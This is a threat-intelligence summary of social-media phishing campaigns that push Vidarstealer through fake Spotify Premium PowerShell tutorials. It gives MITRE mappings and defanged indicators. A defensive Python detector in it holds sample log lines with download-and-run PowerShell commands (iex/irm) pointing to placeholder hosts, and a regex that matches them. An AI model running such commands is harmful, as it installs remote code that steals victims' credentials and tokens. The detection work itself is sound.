Phishing Attacks Leverage TikTok, Instagram Reels

ReversingLabs documented two short-form video phishing campaigns on TikTok and Instagram Reels that lure users with promises of free premium software and then redirect them to attacker-controlled sites. One campaign delivers Vidarstealer through a fake Spotify Premium tutorial, while the other uses engagement bait and comment replies to push victims toward dubious download pages. #Vidarstealer #TikTok #InstagramReels #SpotifyPremium

Keypoints

  • ReversingLabs found two distinct social engineering campaigns using short-form videos as a phishing vector.
  • The campaigns primarily targeted users on TikTok and Instagram Reels.
  • One method used polished fake tutorials, while the other used casual “free premium” posts and comment bait to generate engagement.
  • Victims were redirected to secondary websites offering free software or premium features that were suspicious or malicious.
  • The fake Spotify Premium tutorial led to downloading build.exe, identified as Vidarstealer.
  • Vidarstealer is described as a malware-as-a-service infostealer that steals credentials, financial data, and tokens.
  • Researchers also observed takedown or inactivity for several associated domains, though the social media accounts and tactics could be rapidly recreated.

MITRE Techniques

  • [T1566] Phishing – Threat actors used short-form social media videos to lure users into visiting malicious sites and following harmful instructions (‘short-form videos on social media apps are currently being leveraged by threat actors as a phishing vector’).
  • [T1204] User Execution – Victims were encouraged to run PowerShell commands and download files themselves after trusting the tutorial (‘showing users step-by-step how to access Powershell… and what command to input’).
  • [T1059.001] PowerShell – The lure instructed users to open PowerShell and execute a command to fetch a script (‘how to access Powershell from the Windows menu’).
  • [T1105] Ingress Tool Transfer – The command was used to retrieve scripts or malware from a remote site (‘the iex irm command will download scripts present at the specified address’).
  • [T1566.002] Spearphishing Link – The videos and profile descriptions directed users to external domains hosting downloads or tutorials (‘drive viewers to a secondary website’).
  • [T1585] Establish Accounts – Attackers used multiple nearly identical social media accounts to spread the lure at scale (‘a myriad of almost identical accounts’).
  • [T1647] Acquire Infrastructure – Malicious domains were used as delivery points for downloads and survey redirections (‘sites, like pluginchad[.]xyz or maxapk[.]xyz’).
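The iex/irm download-and-run pattern cited under T1059.001 and T1105 is a compact detection target for defenders. As an added example that is not part of the ReversingLabs write-up, the Python below scans constructed PowerShell Script Block Logging (Event ID 4104) records and flags only those in which a remote fetch is handed to Invoke-Expression; fetch-only and exec-only scripts are left alone, and the hostnames are placeholders.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed Event ID 4104 script-block records for this demo (not from the
# report); every host below is a placeholder under the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {"record": 1, "script": "iex (irm http://lure.example.invalid/spotify)"},
    {"record": 2, "script": "irm https://lure.example.invalid/s | iex"},
    {"record": 3, "script": "Invoke-Expression (Invoke-RestMethod -Uri 'https://lure.example.invalid/x')"},
    {"record": 4, "script": "iex (irm lure.example.invalid/spotify)"},          # scheme omitted
    {"record": 5, "script": "$r = irm https://api.example.invalid/status; $r.ok"},  # fetch only
    {"record": 6, "script": "iex 'Get-Date'"},                                   # exec only
    {"record": 7, "script": "Get-ChildItem C:\\Users | Sort-Object Name"},
]

# Aliases that execute a string as code, and aliases that fetch remote content.
EXEC_RE = re.compile(r"(?i)\b(iex|invoke-expression)\b")
FETCH_RE = re.compile(r"(?i)\b(irm|iwr|invoke-restmethod|invoke-webrequest)\b")
# Target of the fetch: a URL with scheme, or a bare host/path token after the alias.
TARGET_RE = re.compile(
    r"(?i)(?:irm|iwr|invoke-restmethod|invoke-webrequest)\s+(?:-uri\s+)?['\"]?"
    r"((?:https?://)?[a-z0-9.-]+\.[a-z]{2,}(?:/[^\s'\")|;]*)?)"
)


@dataclass(frozen=True)
class Finding:
    record: int
    target: str


def classify(script: str) -> Optional[str]:
    """Return the fetch target when the script both fetches remote content and
    feeds it to Invoke-Expression (the iex/irm pattern); otherwise None."""
    if not (EXEC_RE.search(script) and FETCH_RE.search(script)):
        return None
    m = TARGET_RE.search(script)
    return m.group(1) if m else "<target not parsed>"


def scan(events) -> List[Finding]:
    """Run classify() over 4104 records and keep only the download-and-run hits."""
    return [Finding(e["record"], t) for e in events if (t := classify(e["script"]))]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"record {f.record}: remote code fed to iex from {f.target}")
```

The target string that comes back is what an analyst would pivot on (block at the proxy, hunt for in other 4104 records); a bare host without a scheme is still captured because the aliases accept one.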

Indicators of Compromise

  • [File Hash] Vidarstealer sample – 03bbc4fa1fd784276da135ab62fef85aaddea66e6eb176d7e59c3398f818b153
  • [Domains] Malicious download and lure sites – pluginchad[.]xyz, maxapk[.]xyz, and 2 more domains
  • [Domains] Command-and-download / lure endpoint – msget[.]run, msget[.]run/spotify, and slmgr[.]sh
  • [Domains] Secondary lure site analyzed in sandbox – d4ug[.]site
  • [Social Media Accounts] TikTok lure accounts – tiktok[.]com/@windows.tips, tiktok[.]com/@windows.insight, and 3 more accounts
  • [Social Media Accounts] Instagram lure accounts – instagram[.]com/wtips404, instagram[.]com/wndwstips, and instagram[.]com/epemberton369
  • [File Name] Delivered executable – build.exe


Read more: https://www.reversinglabs.com/blog/social-media-attacks-phishing